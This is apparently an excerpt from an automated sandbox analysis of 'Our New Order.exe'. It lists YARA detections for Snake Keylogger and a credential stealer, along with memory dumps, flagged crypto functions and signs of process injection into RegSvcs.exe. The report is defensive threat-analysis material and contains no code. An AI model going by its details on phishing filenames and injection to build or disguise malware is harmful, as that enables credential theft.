Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Our New Order.exe
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_03244218 0_2_03244218
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_03246F93 0_2_03246F93
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_0324D584 0_2_0324D584
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_059C9AD8 0_2_059C9AD8
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_059C9AC9 0_2_059C9AC9
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A40040 0_2_07A40040
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A437C0 0_2_07A437C0
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A42F50 0_2_07A42F50
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A44E98 0_2_07A44E98
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A43388 0_2_07A43388
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A43BF8 0_2_07A43BF8
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A43378 0_2_07A43378
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A40007 0_2_07A40007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011C6108 3_2_011C6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CC190 3_2_011CC190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CF007 3_2_011CF007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CB328 3_2_011CB328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CC470 3_2_011CC470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CC753 3_2_011CC753
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011C9858 3_2_011C9858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011C6880 3_2_011C6880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CBBD3 3_2_011CBBD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CCA33 3_2_011CCA33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011C4AD9 3_2_011C4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CBEB0 3_2_011CBEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CE517 3_2_011CE517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CE528 3_2_011CE528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011C3573 3_2_011C3573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011CB4F3 3_2_011CB4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_051411C0 3_2_051411C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05140040 3_2_05140040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05143870 3_2_05143870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05148460 3_2_05148460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05147B70 3_2_05147B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05140900 3_2_05140900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514E908 3_2_0514E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514B930 3_2_0514B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514ED50 3_2_0514ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05140D51 3_2_05140D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514B940 3_2_0514B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05140D60 3_2_05140D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514ED60 3_2_0514ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05147D90 3_2_05147D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514BD98 3_2_0514BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514BD88 3_2_0514BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_051411B0 3_2_051411B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514F1B8 3_2_0514F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514F1A9 3_2_0514F1A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514C1F0 3_2_0514C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514C1E0 3_2_0514C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05140006 3_2_05140006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514DC00 3_2_0514DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514E058 3_2_0514E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514E049 3_2_0514E049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05140490 3_2_05140490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514E4B0 3_2_0514E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_051404A0 3_2_051404A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514E4A0 3_2_0514E4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514B4D7 3_2_0514B4D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_051408F0 3_2_051408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514E8F8 3_2_0514E8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514B4E8 3_2_0514B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514D350 3_2_0514D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514D340 3_2_0514D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514D798 3_2_0514D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514D7A8 3_2_0514D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_051437CB 3_2_051437CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514DBF1 3_2_0514DBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_051473E8 3_2_051473E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514F610 3_2_0514F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514F600 3_2_0514F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514C638 3_2_0514C638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514FA59 3_2_0514FA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514C648 3_2_0514C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514FA68 3_2_0514FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514CA90 3_2_0514CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514CAA0 3_2_0514CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514CEF8 3_2_0514CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0514CEEA 3_2_0514CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571BD38 3_2_0571BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571C9D8 3_2_0571C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05718C51 3_2_05718C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571D028 3_2_0571D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571A408 3_2_0571A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571B0A0 3_2_0571B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571C388 3_2_0571C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571D670 3_2_0571D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571AA58 3_2_0571AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05718608 3_2_05718608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571B6E8 3_2_0571B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05717D58 3_2_05717D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05710D48 3_2_05710D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05717D48 3_2_05717D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05710D39 3_2_05710D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571BD28 3_2_0571BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05717900 3_2_05717900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057185F8 3_2_057185F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571C9C8 3_2_0571C9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057181B0 3_2_057181B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057111A0 3_2_057111A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057181A0 3_2_057181A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05715198 3_2_05715198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571518A 3_2_0571518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05717050 3_2_05717050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05710040 3_2_05710040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05717040 3_2_05717040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05714430 3_2_05714430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05712818 3_2_05712818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571D018 3_2_0571D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05710007 3_2_05710007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05712807 3_2_05712807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057178F0 3_2_057178F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057108F0 3_2_057108F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057108E0 3_2_057108E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057174A8 3_2_057174A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05717497 3_2_05717497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05710498 3_2_05710498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05710488 3_2_05710488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571B08F 3_2_0571B08F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05716778 3_2_05716778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571C378 3_2_0571C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571676A 3_2_0571676A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05713730 3_2_05713730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05716320 3_2_05716320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05716310 3_2_05716310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571A3F8 3_2_0571A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05716BD0 3_2_05716BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05716BC1 3_2_05716BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057133B8 3_2_057133B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_057133A8 3_2_057133A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05715A70 3_2_05715A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571D661 3_2_0571D661
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05715A60 3_2_05715A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571AA48 3_2_0571AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05715618 3_2_05715618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571560A 3_2_0571560A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0571B6D9 3_2_0571B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05715EC8 3_2_05715EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05715EB8 3_2_05715EB8
Sample file is different than original file name gathered from version info
Source: Our New Order.exe, 00000000.00000002.965365648.00000000079B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Our New Order.exe
Source: Our New Order.exe, 00000000.00000002.951812367.000000000148E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Our New Order.exe
Source: Our New Order.exe, 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Our New Order.exe
Source: Our New Order.exe, 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Our New Order.exe
Source: Our New Order.exe, 00000000.00000002.952994858.00000000034B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Our New Order.exe
Source: Our New Order.exe, 00000000.00000000.900888632.0000000000E82000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameeGud.exe6 vs Our New Order.exe
Source: Our New Order.exe Binary or memory string: OriginalFilenameeGud.exe6 vs Our New Order.exe
Uses 32bit PE files
Source: Our New Order.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
